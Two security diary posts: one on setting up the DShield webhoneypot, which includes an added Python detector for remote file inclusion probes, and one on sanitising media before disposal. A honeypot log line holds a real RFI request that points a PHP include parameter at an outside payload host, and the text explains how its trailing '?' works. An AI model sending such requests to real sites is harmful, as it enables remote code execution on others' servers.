Webhoneypot fun

Published: 2009-03-26
Last Updated: 2009-03-27 06:42:17 UTC
by Mark Hofman (Version: 1)
1 comment(s)

37 days ago the DShield webhoneypot project released the first Alpha of the code.  I hadn't really had much time to play with it yet, but one of our readers had a challenge with his submissions, so I figured I'd better get my hands dirty.   Another reason is that there does seem to be a lot of malicious web traffic around at the moment and I wanted to grab some of it. 

So here is a quick run down of my webhoneypot experience.  

Firstly I logged into DShield and under "My Information" I entered the Honeypot URL and ticked the "Honeypot is Active" box.

Next, grab the code. The code is hosted on Google and can be obtained here. The site has install information, and several releases are available: the raw code, a Debian package and a Mac OS X package. Looking at the install instructions I decided to go with the Debian package. (Now before you chuckle, it was because I only had about 15 minutes or so to get it done and, like many time-poor people, I like shortcuts. It was not because the install instructions are not good. In fact, quite the opposite.)

So I built a new Debian 5 VM in VirtualBox, which was straightforward. I only installed a very minimal system with Apache and PHP5. About 10 minutes gone.

After grabbing the deb file I installed it using the "Installation with a Debian Package" instructions, which took about 3 seconds or so. It asks you what port number you would like to use, sets up the relevant start jobs etc. In short it does pretty much everything for you. Once you have completed this step you have a honeypot running on the machine, and all you need to do is edit /opt/webhoneypot/etc/config.local and enter your DShield userid (which will be your email address) and password as two lines, userid=yourdshieldemailaddress and password=thepasswordfortheuserid. Do not put quotes around the values.

The final step after this was to open a browser and go to the web page. When you hit the page you will get a message along the lines of "Check logfile for hashpassword". This basically verifies that you have successfully connected to DShield. Replace the password=thepasswordfortheuserid line with the hashpassword=738abc..... parameter from the log file and you are good to go; the cleartext password no longer needs to be in the file.

Revisit the web page with, for example, a robots.txt request and you will get a response. When you look in the log file /opt/webhoneypot/logs/honey.... you will see an entry along the lines of timestamp IP-Address Delivered Template 123. If you see that, the log line was delivered to DShield (123 is just an example; you will see different numbers).

Log into DShield again and under the "My Weblogs" tab you should see your test log entries. For example:

Time      URL                                                                 Source         Target
11:11:33  GET /robots.txt HTTP/1.1                                            192.168.22.10  202.999.999.24
11:14:29  GET /robots.txt HTTP/1.1                                            192.168.22.10  202.999.999.24
11:12:36  GET /i.php?page=http://204.2.183.2/babycaleb/picture.htm? HTTP/1.1  192.168.22.10  202.999.999.24
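The third entry in that table is worth a second look: a request of the form /i.php?page=http://host/file? is a remote file inclusion (RFI) probe, trying to get a PHP script to include code fetched from the attacker's server (the trailing "?" turns anything the vulnerable script appends to the parameter into a harmless query string on that server). As an added example, not part of the diary or of the webhoneypot code, here is a small Python script that takes entries in the same four columns as the "My Weblogs" view (the rows below are constructed copies of the table above) and flags requests in which a query parameter carries an absolute URL, reporting the parameter name and the host serving the payload. The detection heuristic and all function names are assumptions of this example, not anything the DShield project provides.

```python
"""Flag remote file inclusion (RFI) probes in DShield webhoneypot entries.

Added example, not part of the diary or the webhoneypot project. The
SAMPLE_ENTRIES rows are constructed copies of the "My Weblogs" table in the
diary; the heuristic and helper names are assumptions of this example.
"""
from urllib.parse import parse_qsl, urlsplit

# Schemes PHP's include()/require() will fetch over the network when
# allow_url_include is on; a parameter value with one of these is an RFI try.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}

# Constructed sample in the "My Weblogs" column order:
# (time, request line, source IP, target/honeypot IP). 202.999.999.24 is the
# diary's sanitised placeholder for the honeypot address.
SAMPLE_ENTRIES = [
    ("11:11:33", "GET /robots.txt HTTP/1.1", "192.168.22.10", "202.999.999.24"),
    ("11:14:29", "GET /robots.txt HTTP/1.1", "192.168.22.10", "202.999.999.24"),
    ("11:12:36", "GET /i.php?page=http://204.2.183.2/babycaleb/picture.htm? HTTP/1.1",
     "192.168.22.10", "202.999.999.24"),
]


def parse_request_line(request_line):
    """Split 'METHOD request-target HTTP/x.y' into (method, target, version).

    Spaces inside the target are re-joined rather than rejected: scanners
    send malformed lines and we want to see them, not drop them.
    """
    parts = request_line.split(" ")
    if len(parts) < 3 or not parts[-1].startswith("HTTP/"):
        raise ValueError("not an HTTP request line: %r" % request_line)
    return parts[0], " ".join(parts[1:-1]), parts[-1]


def find_rfi(target):
    """Return (parameter, url) for the first query parameter whose decoded
    value is an absolute remote URL, or None.

    parse_qsl already percent-decodes, so ?page=http%3A%2F%2F... is caught
    as well as the plain form. A trailing '?' on the value is typical: it
    turns whatever the vulnerable script appends (e.g. '.php') into a query
    string on the attacker's server, so the include still fetches the payload.
    """
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        parsed = urlsplit(value)
        if parsed.scheme.lower() in REMOTE_SCHEMES and parsed.netloc:
            return name, value
    return None


def classify(entry):
    """Turn one (time, request line, src, dst) row into a finding dict."""
    when, request_line, src, dst = entry
    method, target, _version = parse_request_line(request_line)
    finding = {"time": when, "src": src, "dst": dst, "method": method,
               "path": urlsplit(target).path}
    rfi = find_rfi(target)
    if rfi is None:
        finding["kind"] = "benign"
    else:
        param, url = rfi
        finding.update(kind="rfi", param=param, payload_url=url,
                       payload_host=urlsplit(url).hostname)
    return finding


def rfi_payload_hosts(entries):
    """Distinct hosts serving include payloads: the thing to block or report,
    since the probing source IP is often itself a compromised box."""
    return sorted({f["payload_host"] for f in map(classify, entries)
                   if f["kind"] == "rfi"})


if __name__ == "__main__":
    for f in map(classify, SAMPLE_ENTRIES):
        if f["kind"] == "rfi":
            print("%s %s RFI probe via %s?%s= -> payload on %s" %
                  (f["time"], f["src"], f["path"], f["param"], f["payload_host"]))
        else:
            print("%s %s %s %s" % (f["time"], f["src"], f["method"], f["path"]))
    print("payload hosts:", ", ".join(rfi_payload_hosts(SAMPLE_ENTRIES)))
```

Run it on the constructed rows and the two robots.txt fetches come out as benign while the i.php request is reported as an RFI probe with its payload host; feed it your own exported weblog rows in the same column order and rfi_payload_hosts gives you the list of servers hosting include payloads, which is more useful to report than the scanning IP.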

Total time taken: twenty minutes. Ten minutes to install an OS onto the VM, five minutes or so because I borked my VM's network connection, and a final five minutes to install and configure the honeypot.

The guys on the team have done a great job.  If you have a spare IP this is a great way to contribute.  Give it a go. 

Mark H - Shearwater 

For those of you who are students and think honeypots might be something you are interested in, check out the Honeynet Project Google Summer of Code page http://www.honeynet.org/gsoc .


Sanitising media

Published: 2009-03-26
Last Updated: 2009-03-26 21:05:07 UTC
by Mark Hofman (Version: 1)
0 comment(s)

Pat asked an interesting question. He, like many of us, has the requirement to make sure that information doesn't accidentally leave the organisation on equipment that is being disposed of.

To stop this, many of us will have procedures to sanitise or destroy media, but what exactly are you targeting? Hard disks, CDs, DVDs and USB/flash drives are the obvious ones. BlackBerrys, iPhones or MP3 players are less obvious devices. However, what else should you cleanse or even destroy?

Here are some things that I thought of that could be included:

  • Hard disks from Printers
  • Printer drums
  • Cameras
  • Digital photo Frames

Let me know what other devices you sanitise before leaving the organisation. 

Mark H 


Comments

What's this all about ..?
password reveal .
